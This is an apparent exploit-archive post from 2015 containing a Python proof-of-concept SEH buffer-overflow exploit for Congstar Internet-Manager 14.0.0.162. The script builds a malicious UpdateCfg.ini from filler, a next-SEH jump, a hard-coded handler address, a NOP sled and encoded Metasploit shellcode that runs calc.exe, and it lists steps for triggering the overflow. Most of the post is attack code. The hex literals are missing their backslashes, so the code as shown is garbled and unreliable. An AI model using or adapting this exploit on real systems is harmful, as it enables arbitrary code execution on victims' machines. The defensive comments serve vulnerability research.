
Congstar Internet-Manager SEH Buffer Overflow

Posted on 14 January 2015

#!/usr/bin/python
#Exploit Title:Congstar Internet-Manager SEH Buffer Overflow
#Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100)
#Homepage:www.congstar.de/downloads/prepaid-internet-stick/
#Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip
#Version:14.0.0.162
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Windows 7 En
#
# Purpose: Python 2 proof of concept that writes a crafted UpdateCfg.ini into
# the current directory. The file is ordinary-looking update configuration
# (buffer1, buffer2) wrapped around one oversized "UpdateReport=" value (poc).
# According to the instructions printed below, the application reads the file
# from its Bin directory when the user triggers an update check.
#
# NOTE(review): every "xNN" run in this listing looks like a "\xNN" hex escape
# whose backslash was lost when the page was extracted; the same seems true of
# the Windows path in the first print and of the " " delimiters (possibly "\n").
# The literals are reproduced exactly as the page shows them, so the decoded
# values mentioned in the comments below are an interpretation - confirm
# against the original advisory.
#
# Defender view: the malformed input is a local configuration file, so the
# practical checks are who can write to the application's Bin directory
# (not shown on the page) and whether an UpdateCfg.ini there carries an
# UpdateReport value far longer than a normal setting.

# Operator instructions (English, then the German menu path).
print "[*]Copy UpdateCfg.ini to C:Program FilescongstarInternetmanagerBin "
print "[*]Open Program and go to Menu-Options "
print "[*]Click Update and press Now look for Update "
print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen "

from struct import pack

# Leading part of the INI file. Read as hex escapes this spells the [UPDATE]
# section (ENABLE_UPDATE=1, UPDATE_FREQUENCE=14) and the start of [Service]
# with a ServiceURL entry - plain configuration, no payload.
buffer1 = "x5bx55x50x44x41x54x45x5dx0ax0ax45x4ex41x42x4cx45x5fx55x50x44x41x54x45x3dx31x0ax0ax55x50x44"
buffer1 += "x41x54x45x5fx46x52x45x51x55x45x4ex43x45x3dx31x34x0ax0ax5bx53x65x72x76x69x63x65x5dx0ax0ax53"
buffer1 += "x65x72x76x69x63x65x55x52x4cx3dx68x74x74x70x73x3ax2fx2fx74x6dx6fx62x69x6cx65x2ex7ax74x65x2e"
buffer1 += "x63x6fx6dx2ex63x6ex2fx55x70x64x61x74x65x45x6ex74x72x79x2ex61x73x70x78x0a"

# Filler repeated 18164 times; presumably sized to reach the exception-handler
# record on the stack (the page title calls this an SEH overflow) - the page
# does not explain how the length was derived.
junk="x41" * 18164
# Four-byte value placed in the "next SEH" slot; read as hex escapes it is
# EB 06 90 90.
nseh="xebx06x90x90"
# Handler pointer, packed as a little-endian unsigned 32-bit integer. The page
# does not name the module that owns this address. A hard-coded handler
# address only holds if that module loads at a fixed base and is not covered
# by SafeSEH, which is why SEHOP and ASLR-enabled rebuilds are the relevant
# mitigations.
seh=pack('<I',0x7C3A1868)#7C3A1868
# 100-element padding placed between the handler record and the payload.
nops="x90" * 100
# Author's record of how the payload was generated: a windows/exec payload
# running calc.exe (a visible proof of code execution), encoded with
# x86/alpha_upper while avoiding the listed bad characters.
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R |
#msfencode -e x86/alpha_upper -b "x00x0ax0dx1axff" -t c
# Adjacent string literals inside the parentheses concatenate into one string.
shellcode=("x89xe2xddxc1xd9x72xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx5ax48x4dx59x55x50"
"x35x50x35x50x53x50x4dx59x4bx55x46x51x59x42x33"
"x54x4cx4bx56x32x30x30x4cx4bx31x42x44x4cx4cx4b"
"x30x52x45x44x4cx4bx44x32x57x58x34x4fx38x37x50"
"x4ax51x36x46x51x4bx4fx30x31x49x50x4ex4cx47x4c"
"x33x51x43x4cx34x42x36x4cx31x30x49x51x48x4fx54"
"x4dx45x51x59x57x4dx32x4cx30x56x32x46x37x4cx4b"
"x31x42x44x50x4cx4bx31x52x57x4cx43x31x48x50x4c"
"x4bx51x50x53x48x4bx35x49x50x34x34x51x5ax53x31"
"x4ex30x36x30x4cx4bx50x48x52x38x4cx4bx36x38x47"
"x50x45x51x58x53x4bx53x57x4cx37x39x4cx4bx36x54"
"x4cx4bx33x31x39x46x30x31x4bx4fx56x51x49x50x4e"
"x4cx4fx31x58x4fx44x4dx55x51x49x57x37x48x4dx30"
"x52x55x4bx44x43x33x43x4dx4ax58x37x4bx33x4dx57"
"x54x33x45x4bx52x30x58x4cx4bx36x38x57x54x33x31"
"x58x53x55x36x4cx4bx54x4cx30x4bx4cx4bx56x38x45"
"x4cx35x51x58x53x4cx4bx55x54x4cx4bx33x31x38x50"
"x4bx39x57x34x31x34x46x44x51x4bx31x4bx53x51x30"
"x59x50x5ax46x31x4bx4fx4dx30x51x48x31x4fx30x5a"
"x4cx4bx34x52x5ax4bx4cx46x31x4dx33x5ax43x31x4c"
"x4dx4cx45x38x39x55x50x45x50x43x30x50x50x53x58"
"x56x51x4cx4bx32x4fx4cx47x4bx4fx38x55x4fx4bx4b"
"x4ex44x4ex30x32x4ax4ax32x48x39x36x4cx55x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx33x36x43x4cx35x5ax4d"
"x50x4bx4bx4bx50x54x35x33x35x4fx4bx47x37x52x33"
"x54x32x32x4fx42x4ax43x30x46x33x4bx4fx49x45x52"
"x43x53x51x42x4cx53x53x46x4ex43x55x43x48x35x35"
"x43x30x41x41")

# The one abnormal entry in the file: "UpdateReport=" followed by the filler,
# the overwritten handler record, padding and payload, in that order.
poc=" " + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +" "

# Trailing part of the INI file. Read as hex escapes this spells ServicePort,
# UPDATE_PATH, RETRY_CONNECT, RETRY_SLEEP, CONNECT_TIMEOUT and the
# [UpdateMode] section - again plain configuration.
buffer2 = "x53x65x72x76x69x63x65x50x6fx72x74x3dx34x34x33x0ax0ax55x50x44x41x54x45x5fx50x41x54x48x3dx2e"
buffer2 += "x2fx64x6fx77x6ex6cx6fx61x64x0ax0ax52x45x54x52x59x5fx43x4fx4ex4ex45x43x54x3dx33x30x30x0ax0a"
buffer2 += "x52x45x54x52x59x5fx53x4cx45x45x50x3dx31x0ax0ax43x4fx4ex4ex45x43x54x5fx54x49x4dx45x4fx55x54"
buffer2 += "x3dx32x30x0ax0ax5bx55x70x64x61x74x65x4dx6fx64x65x5dx0ax0ax4dx6fx64x65x53x65x6cx65x63x74x53"
buffer2 += "x79x73x3dx31x0a"

# Full file content: normal header + oversized UpdateReport line + normal footer.
exploit = buffer1 + poc + buffer2

# Write the result to UpdateCfg.ini in the working directory.
# NOTE(review): the bare except hides the real cause of any failure (only
# "Error" is printed), and the handle is not closed if write() raises.
try:
    out_file = open("UpdateCfg.ini",'w')
    out_file.write(exploit)
    out_file.close()
except:
    print "Error"

 
